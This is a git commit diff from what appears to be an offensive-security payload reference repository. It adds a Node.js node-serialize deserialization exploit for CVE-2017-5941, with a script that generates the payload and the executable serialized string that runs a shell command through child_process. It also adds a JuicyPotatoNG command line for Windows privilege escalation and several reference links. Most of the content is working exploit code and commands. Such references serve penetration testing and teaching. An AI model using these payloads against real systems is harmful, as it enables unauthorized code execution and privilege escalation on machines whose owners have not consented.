NodeJS Serialization

2024-05-04 06:46:13 +02:00 · 2022-09-23 11:21:29 +02:00 · 2022-09-23 11:21:29 +02:00 · 72a8556dc9
parent 7a528ccb3f
commit 72a8556dc9
3 changed files with 49 additions and 1 deletions
--- a/Deserialization/Files/node-serialize.js
+++ b/Deserialization/Files/node-serialize.js
@ -0,0 +1,5 @@
+var y = {
+    rce : function(){require('child_process').exec('ls /', function(error,stdout, stderr) { console.log(stdout) });},
+}
+var serialize = require('node-serialize');
+console.log("Serialized: \n" + serialize.serialize(y));
--- a/Deserialization/Node.md
+++ b/Deserialization/Node.md
@ -0,0 +1,34 @@
+# Node
+
+## Summary
+
+* [Exploit](#exploit)
+* [References](#references)
+
+## Exploit
+
+> An issue was discovered in the node-serialize package 0.0.4 for Node.js. Untrusted data passed into the `unserialize()` function can be exploited to achieve arbitrary code execution by passing a JavaScript Object with an Immediately Invoked Function Expression (IIFE).
+
+1. Generate a serialized payload
+    ```js
+    var y = {
+        rce : function(){
+            require('child_process').exec('ls /', function(error,
+            stdout, stderr) { console.log(stdout) });
+        },
+    }
+    var serialize = require('node-serialize');
+    console.log("Serialized: \n" + serialize.serialize(y));
+    ```
+2. Add bracket `()` to force the execution
+    ```js
+    {"rce":"_$$ND_FUNC$$_function(){require('child_process').exec('ls /', function(error,stdout, stderr) { console.log(stdout) });}()"}
+    ```
+3. Send the payload
+
+
+## References
+
+* [Exploiting Node.js deserialization bug for Remote Code Execution (CVE-2017-5941) - Ajin Abraham](https://www.exploit-db.com/docs/english/41289-exploiting-node.js-deserialization-bug-for-remote-code-execution.pdf)
+* [NodeJS Deserialization - 8 January 2020- gonczor](https://blacksheephacks.pl/nodejs-deserialization/)
+* [CVE-2017-5941 - NATIONAL VULNERABILITY DATABASE - 02/09/2017](https://nvd.nist.gov/vuln/detail/CVE-2017-5941)
--- a/Resources/Windows
+++ b/Resources/Windows
@ -1289,6 +1289,14 @@ C:\Windows\Microsoft.Net\Framework\V3.5\csc.exe EfsPotato.cs
 C:\Windows\Microsoft.Net\Framework\V3.5\csc.exe /platform:x86 EfsPotato.cs
 ```

+### JuicyPotatoNG
+
+* [antonioCoco/JuicyPotatoNG](https://github.com/antonioCoco/JuicyPotatoNG)
+
+```powershell
+JuicyPotatoNG.exe -t * -p "C:\Windows\System32\cmd.exe" -a "/c whoami" > C:\juicypotatong.txt
+```
+

 ## EoP - Privileged File Write

@ -1505,4 +1513,5 @@ Detailed information about the vulnerability : https://www.zerodayinitiative.com
 * [Abusing SeLoadDriverPrivilege for privilege escalation - 14 JUN 2018 - OSCAR MALLO](https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/)
 * [Universal Privilege Escalation and Persistence – Printer - AUGUST 2, 2021)](https://pentestlab.blog/2021/08/02/universal-privilege-escalation-and-persistence-printer/)
 * [ABUSING ARBITRARY FILE DELETES TO ESCALATE PRIVILEGE AND OTHER GREAT TRICKS - March 17, 2022 | Simon Zuckerbraun](https://www.zerodayinitiative.com/blog/2022/3/16/abusing-arbitrary-file-deletes-to-escalate-privilege-and-other-great-tricks)
-* [Bypassing AppLocker by abusing HashInfo - 2022-08-19 - Ian](https://shells.systems/post-bypassing-applocker-by-abusing-hashinfo/)
+* [Bypassing AppLocker by abusing HashInfo - 2022-08-19 - Ian](https://shells.systems/post-bypassing-applocker-by-abusing-hashinfo/)
+* [Giving JuicyPotato a second chance: JuicyPotatoNG - @decoder_it, @splinter_code](https://decoder.cloud/2022/09/21/giving-juicypotato-a-second-chance-juicypotatong/)